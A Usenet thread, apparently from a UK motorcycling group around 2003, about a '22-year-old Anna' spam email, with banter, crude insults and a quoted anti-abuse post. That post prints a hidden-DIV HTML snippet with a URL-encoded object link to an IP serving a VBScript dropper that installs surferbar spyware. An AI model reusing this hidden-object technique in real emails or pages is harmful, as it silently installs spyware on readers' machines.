OFF TOPIC Question

Has anyone recently had an email like this ? If so, what is the con ?

-----------------------------------------------------------
From:
Subject: Hey....!

^^^^^^^^^^^^^^^^^^^^^^^^^ uxcc

Hello,

I'm 22 years old female and my name is Anna. I saw your profile on the net
and found to be ^^^^
interesting.. email me back at if you want to
exchange pictures or whatever..

Hugs, later...

-----------------------------------------------------------

 

Anna is a man.

--
cane [at] ukrm.org ¦ fireblade, r30
botafo t#50 f#03 YTC #15 bbb #6 pm #6 apostle [kotl]
New? http://www.ukrm.net/faq/ukrmscbt.html
Rideout? http://www.horrible.demon.co.uk/botafof/
"What was your crime Spazpecker?"

 

and will be guaranteed to sell your valid email address to the whole
spamming world. But that's kind of irrelevant, as they already have it.

 

Take a look in the mirror, then try to imagine what anna@hotmail will look
like. Be really honest with yourself and you will find your own conclusion
about whether it's a con or not.
;o)

Rob

--
GSX-R750, CBR 1100 XX
BONY#something
"Failure isn't falling down,
it's staying down"

Replace 'spam' with 'org' to reply

 

The con is as below. If you use a Mac, Sun system or Linux, you are OK, if
you use Windows, read on McDuff!


Blagged from N.A.N.E





Newsgroups:

news.admin.net-abuse.email

From:

Spamless <>

Subject:

surferbar, trojan/spyware/adware - spamming (attempt secretly to install it)

User-Agent:

slrn/0.9.7.4 (FreeBSD)

NNTP-Posting-Host:

www.inch.com

Message-ID:

<>

Date:

3 Sep 2003 07:35:50 -0400

X-Trace:

nntp2.nac.net 1062588950 www.inch.com (3 Sep 2003 07:35:50 -0400)

Lines:

34

Path:


news.userve.net!news3.cwci.net!peernews!peer.cwci.net!kibo.news.demon.net!demon!news.maxwell.syr.edu!newspeer1.nwr.nac.net!nntp2.nac.net


Xref:

news.userve.net news.admin.net-abuse.email:255423



no references



Just posted in NANAS. Subject: " How you been?"

The spam looks quite innocent, even in your HTML enabled mail client.

"Want to go to the pub on Saturday?
Last Saturday was a blast!
Let me know!"

Of course there is the hidden DIVision with an object in it:

[div style="display.none"]
[object data="
http://%363.2%346.%3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"]
[/object][/div]

which downloads http://63.246.130.201/cgi-bin/a.cgi which is a VBScript
file.
If your security settings are lax, it writes an executable which downloads
and installs http://63.246.130.201/surferbar.dll. Note that
www.surferbar.com
is at IP address 63.246.130.200 and that there is no affilate code in the
URL (for the object data - it is just http://63.246.130.201/cgi-bin/a.cgi)
so it is surferbar.com itself spamming and trying to use the spam to install
the trojan/spyware/adware browser hijacking software.

The LART in NANAS is long since it includes the full list of the URLs
(their partners) from the *dll file.

 

For "22" substitute '50-ish'

For "female", substitute 'occasionally bipedal, possibly humanoid,
net consumer of oxygen' ... and so on.

 

...and will entice you to call her on a premium rate number and then pay to
join her pay site.

--
cane [at] ukrm.org ¦ fireblade, r30
botafo t#50 f#03 YTC #15 bbb #6 pm #6 apostle [kotl]
New? http://www.ukrm.net/faq/ukrmscbt.html
Rideout? http://www.horrible.demon.co.uk/botafof/
"What was your crime Spazpecker?"

 

To confirm that indeed she is a he as earlier stated, thus creating a
feedback loop. feedback loop. feedback loop.

 

She's a bit old for me, ta

 

You're just spaming or something, aren't you? If you aren't - its
spam. I get fifteen emails a day just like it (or offering similar).

 

ManAnna from Heaven?

 

<snip spam>

FFS as if I don't get enough spam now I get to read other people's
recycled spam posted here. Get a life!

 

I can be an obtuse doofus at times. The OP posted a variant ( one of two
variants of that theme ) of a nasty spam that is doing the rounds. This
spam is now mutating and poor old Windows users who persist in using
Outlook Express ( and I think Outlook ) without turning all security
settings to 'I is a paranoid sod' may well get 'hooked' by them.

I have spent the best of the last two days at work contacting customers who
have been spamming, relaying and scanning as a direct result of these
'hidden DIV' emails and activeX emails auto-bollockerating on opening.

I have seen our mailqueues rise to hitherto unknown levels as time based
trojans kick mail out from the ADSL users infected machines overnight.
Hateful.

<smug mode>

Linux and Solaris at home and at work.

</smug mode>

 

Has anyone recently had an email like this ? If so, what is the con ?

OK, OK I get the picture. I thought as much but I can still dream can't I ?

Please ? No f*ck it I'm still awake.

Tks guys & all

Jon

SP1, 2 x SV650s, NC29

 

Tit.

 

That is quite polite. Most folk use the term twat as an opener, then they
meet me and it migrates to ****.